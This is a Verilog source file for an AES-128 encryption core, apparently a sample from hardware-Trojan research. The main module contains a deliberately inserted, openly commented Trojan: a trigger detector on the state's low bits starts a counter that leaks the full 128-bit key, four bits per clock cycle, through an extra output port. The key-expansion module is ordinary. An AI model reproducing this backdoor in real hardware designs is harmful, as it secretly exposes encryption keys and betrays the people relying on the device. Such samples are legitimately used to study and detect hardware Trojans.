module aes_128(clk, reset_n, state, key, out, trojan_out);
    input          clk;
    input          reset_n;      // active low reset
    input  [127:0] state, key;
    output [127:0] out;
    output [3:0]   trojan_out;   // Trojan leakage output port

    reg    [127:0] s0, k0;
    wire   [127:0] s1, s2, s3, s4, s5, s6, s7, s8, s9,
                   k1, k2, k3, k4, k5, k6, k7, k8, k9,
                   k0b, k1b, k2b, k3b, k4b, k5b, k6b, k7b, k8b, k9b;

    // Trojan internal signals
    reg  [3:0]  trojan_shift_reg;       // Shift register to detect trigger pattern
    reg  [4:0]  trojan_counter;         // Counter for payload transmission
    reg  [3:0]  trojan_leak_nibble;     // Currently leaked nibble

    // Original AES functionality
    always @ (posedge clk or negedge reset_n) begin
        if (!reset_n) begin
            s0 <= 128'b0;
            k0 <= 128'b0;
            // Initialize Trojan registers
            trojan_shift_reg <= 4'b0;
            trojan_counter <= 0;
            trojan_leak_nibble <= 0;
        end else begin
            s0 <= state ^ key;
            k0 <= key;

            // Trojan insertion: Monitor lower 4 bits of s0 for trigger pattern: 4'b1010
            trojan_shift_reg <= {trojan_shift_reg[2:0], s0[3:0]};

            // If trigger detected, start leak transmission counter
            if (trojan_shift_reg == 4'b1010 && trojan_counter == 0) begin
                trojan_counter <= 16; // leak 16 nibbles to cover 128 bits
            end else if (trojan_counter > 0) begin
                trojan_counter <= trojan_counter - 1;

                // Extract nibble from key for leakage, one nibble per cycle
                // Send MSB nibble first, decrement index accordingly
                trojan_leak_nibble <= key[ (trojan_counter-1)*4 +: 4 ];
            end else begin
                trojan_leak_nibble <= 4'b0;
            end
        end
    end

    // Instantiate original modules
    expand_key_128
        a1 (clk, k0, k1, k0b, 8'h1),
        a2 (clk, k1, k2, k1b, 8'h2),
        a3 (clk, k2, k3, k2b, 8'h4),
        a4 (clk, k3, k4, k3b, 8'h8),
        a5 (clk, k4, k5, k4b, 8'h10),
        a6 (clk, k5, k6, k5b, 8'h20),
        a7 (clk, k6, k7, k6b, 8'h40),
        a8 (clk, k7, k8, k7b, 8'h80),
        a9 (clk, k8, k9, k8b, 8'h1b),
       a10 (clk, k9,   , k9b, 8'h36);

    one_round
        r1 (clk, s0, k0b, s1),
        r2 (clk, s1, k1b, s2),
        r3 (clk, s2, k2b, s3),
        r4 (clk, s3, k3b, s4),
        r5 (clk, s4, k4b, s5),
        r6 (clk, s5, k5b, s6),
        r7 (clk, s6, k6b, s7),
        r8 (clk, s7, k7b, s8),
        r9 (clk, s8, k8b, s9);

    final_round
        rf (clk, s9, k9b, out);

    // Trojan leak output: outputs 4 bits nibble of the key when triggered, else zero
    assign trojan_out = (trojan_counter > 0) ? trojan_leak_nibble : 4'b0;

endmodule

module expand_key_128(clk, in, out_1, out_2, rcon);
    input              clk;
    input      [127:0] in;
    input      [7:0]   rcon;
    output reg [127:0] out_1;
    output     [127:0] out_2;
    wire       [31:0]  k0, k1, k2, k3,
                       v0, v1, v2, v3;
    reg        [31:0]  k0a, k1a, k2a, k3a;
    wire       [31:0]  k0b, k1b, k2b, k3b, k4a;

    assign {k0, k1, k2, k3} = in;

    assign v0 = {k0[31:24] ^ rcon, k0[23:0]};
    assign v1 = v0 ^ k1;
    assign v2 = v1 ^ k2;
    assign v3 = v2 ^ k3;

    always @ (posedge clk)
        {k0a, k1a, k2a, k3a} <= {v0, v1, v2, v3};

    S4
        S4_0 (clk, {k3[23:0], k3[31:24]}, k4a);

    assign k0b = k0a ^ k4a;
    assign k1b = k1a ^ k4a;
    assign k2b = k2a ^ k4a;
    assign k3b = k3a ^ k4a;

    always @ (posedge clk)
        out_1 <= {k0b, k1b, k2b, k3b};

    assign out_2 = {k0b, k1b, k2b, k3b};
endmodule